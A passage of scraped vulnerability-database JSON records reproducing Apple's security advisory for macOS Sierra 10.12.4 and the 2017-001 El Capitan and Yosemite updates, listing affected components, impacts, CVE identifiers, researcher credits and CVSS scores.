sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang(@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in an group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-29T02:52:03", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2423", "CVE-2017-2430", "CVE-2016-7056", "CVE-2016-7936", "CVE-2016-7983", "CVE-2016-9536", "CVE-2016-2161", "CVE-2016-7930", "CVE-2017-2461", "CVE-2017-5341", "CVE-2016-10011", "CVE-2017-2450", "CVE-2016-7931", "CVE-2016-7985", "CVE-2016-3619", "CVE-2016-7922", "CVE-2016-10009", "CVE-2016-9540", "CVE-2016-9935", "CVE-2017-2441", "CVE-2017-5484", "CVE-2017-5203", "CVE-2016-8743", "CVE-2017-2431", "CVE-2017-2435", "CVE-2017-2422", "CVE-2016-10010", "CVE-2017-2439", "CVE-2017-2402", "CVE-2016-7928", "CVE-2017-5342", "CVE-2017-2420", "CVE-2017-2379", "CVE-2017-2428", "CVE-2016-7993", "CVE-2017-2437", "CVE-2017-2483", "CVE-2016-7986", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2443", "CVE-2017-2418", "CVE-2017-2381", "CVE-2017-2489", "CVE-2016-9539", "CVE-2016-7935", "CVE-2017-2451", "CVE-2017-5205", "CVE-2017-2406", "CVE-2016-7934", "CVE-2016-4688", "CVE-2016-9535", "CVE-2017-5486", "CVE-2017-2474", "CVE-2016-5636", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2016-7975", "CVE-2016-7937", "CVE-2016-8575", "CVE-2016-7585", "CVE-2017-2388", "CVE-2017-7070", "CVE-2016-9537", "CVE-2016-8574", "CVE-2016-9538", "CVE-2017-2462", "CVE-2017-2487", "CVE-2016-10160", "CVE-2017-5204", "CVE-2016-7926", "CVE-2016-7939", "CVE-2016-7924", "CVE-2017-2449", "CVE-2017-6974", "CVE-2017-2421", "CVE-2017-2427", "CVE-2016-7974", "CVE-2017-5029", "CVE-2017-2410", "CVE-2017-2482", "CVE-2017-2477", "CVE-2016-10159", "CVE-2017-2458", "CVE-2016-7992", "CVE-2017-2448", "CVE-2016-10012", "CVE-2017-2401", "CVE-2017-2409", "CVE-2016-7932", "CVE-2016-8740", "CVE-2017-2413", "CVE-2017-2408", "CVE-2017-5202", "CVE-2017-2467", "CVE-2016-5387", "CVE-2016-7938", "CVE-2016-7984", "CVE-2017-2490", "CVE-2017-5483", "CVE-2016-9586", "CVE-2017-2407", "CVE-2017-2438", "CVE-2016-7973", "CVE-2017-2426", "CVE-2017-2436", "CVE-2017-2473", "CVE-2016-10161", "CVE-2017-2403", "CVE-2017-2416", "CVE-2017-5482", "CVE-2016-7929", "CVE-2016-7940", "CVE-2016-7923", "CVE-2016-7925", "CVE-2016-9533", "CVE-2017-2398", "CVE-2017-2440", "CVE-2016-10158", "CVE-2016-7927", "CVE-2016-0736", "CVE-2017-5485", "CVE-2017-2425", "CVE-2017-2429", "CVE-2017-2432", "CVE-2016-7933", "CVE-2017-2478"], "modified": "2017-08-29T02:52:03", "id": "APPLE:HT207615", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:57", "description": "# About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nThis document describes the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: The screen may unexpectedly remain unlocked when the lid is closed\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-7070: Ed McKenzie\n\nEntry added August 10, 2017\n\n**Keyboards**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**LibreSSL**\n\nAvailable for: macOS Sierra 10.12.3 and OS X El Capitan v10.11.6\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel allowed an attacker to recover keys. This issue was addressed by introducing constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**libxslt**\n\nAvailable for: OS X El Capitan v10.11.6\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2477\n\nEntry added March 30, 2017\n\n**libxslt**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and Yosemite v10.10.5\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**MCX Client**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Removing a configuration profile with multiple payloads may not remove Active Directory certificate trust\n\nDescription: An issue existed in profile uninstallation. This issue was addressed through improved cleanup.\n\nCVE-2017-2402: an anonymous researcher\n\n**Menus**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2409: Sergey Bylokhov\n\n**Multi-Touch**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2422: @cocoahuke\n\n**OpenSSH**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues in OpenSSH\n\nDescription: Multiple issues existed in OpenSSH before version 7.4. These were addressed by updating OpenSSH to version 7.4.\n\nCVE-2016-10009\n\nCVE-2016-10010\n\nCVE-2016-10011\n\nCVE-2016-10012\n\n**OpenSSL**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local user may be able to leak sensitive user information\n\nDescription: A timing side channel issue was addressed by using constant time computation.\n\nCVE-2016-7056: Cesar Pereida Garc\u00eda and Billy Brumley (Tampere University of Technology)\n\n**Printing**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Clicking a malicious IPP(S) link may lead to arbitrary code execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang(@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in an group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 